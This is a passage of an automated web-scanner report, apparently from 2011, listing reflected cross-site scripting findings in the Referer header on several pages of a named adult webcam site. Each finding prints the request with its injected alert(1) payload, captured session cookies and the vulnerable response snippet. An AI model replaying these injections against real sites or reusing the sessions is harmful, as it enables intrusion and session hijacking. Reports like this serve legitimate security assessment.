...[SNIP]...
ript type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/&rf=http://www.google.com/search?hl=en^q=2ca5e'-alert(1)-'e9dfbf1b8ea&qs=cat=1^roomid=53&qs=cat=1^roomid=53&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.965. http://imlive.com/live-sex-chats/guy-alone/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/guy-alone/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ad47'-alert(1)-'76a1a657857 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/guy-alone/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5ad47'-alert(1)-'76a1a657857

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:48 GMT
Connection: close
Content-Length: 69840
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/&rf=http://www.google.com/search?hl=en^q=5ad47'-alert(1)-'76a1a657857&qs=cat=1^roomid=54&qs=cat=1^roomid=54&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.966. http://imlive.com/live-sex-chats/happyhour/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/happyhour/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1502'-alert(1)-'6f19a081c72 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/happyhour/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=d1502'-alert(1)-'6f19a081c72

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:43 GMT
Connection: close
Content-Length: 22380
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/&rf=http://www.google.com/search?hl=en^q=d1502'-alert(1)-'6f19a081c72&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.967. http://imlive.com/live-sex-chats/lesbian-couple/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/lesbian-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b461'-alert(1)-'6f4815116d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/lesbian-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8b461'-alert(1)-'6f4815116d3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:22 GMT
Connection: close
Content-Length: 118812
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/&rf=http://www.google.com/search?hl=en^q=8b461'-alert(1)-'6f4815116d3&qs=cat=1^roomid=191&qs=cat=1^roomid=191&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

4.968. http://imlive.com/live-sex-chats/lesbian/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/lesbian/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7026c'-alert(1)-'0aae3d52806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/lesbian/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=7026c'-alert(1)-'0aae3d52806

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:47 GMT
Connection: close
Content-Length: 32900
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/&rf=http://www.google.com/search?hl=en^q=7026c'-alert(1)-'0aae3d52806&qs=cat=1^roomid=11&qs=cat=1^roomid=11&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.969. http://imlive.com/live-sex-chats/live-sex-video/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/live-sex-video/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff204'-alert(1)-'8fd9da9f013 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/live-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ff204'-alert(1)-'8fd9da9f013

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:25 GMT
Connection: close
Content-Length: 25009
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/&rf=http://www.google.com/search?hl=en^q=ff204'-alert(1)-'8fd9da9f013&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.970. http://imlive.com/live-sex-chats/nude-chat/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/nude-chat/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bd48'-alert(1)-'6c03af217a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/nude-chat/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=3bd48'-alert(1)-'6c03af217a6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:40 GMT
Connection: close
Content-Length: 23212
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
avascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/&rf=http://www.google.com/search?hl=en^q=3bd48'-alert(1)-'6c03af217a6&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.971. http://imlive.com/live-sex-chats/orgies/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/orgies/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2f14'-alert(1)-'1a0426053d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/orgies/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=e2f14'-alert(1)-'1a0426053d6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:37 GMT
Connection: close
Content-Length: 49057
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/&rf=http://www.google.com/search?hl=en^q=e2f14'-alert(1)-'1a0426053d6&qs=cat=1^roomid=14&qs=cat=1^roomid=14&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.972. http://imlive.com/live-sex-chats/pornstars/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/pornstars/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ae9'-alert(1)-'abc512c790d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/pornstars/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
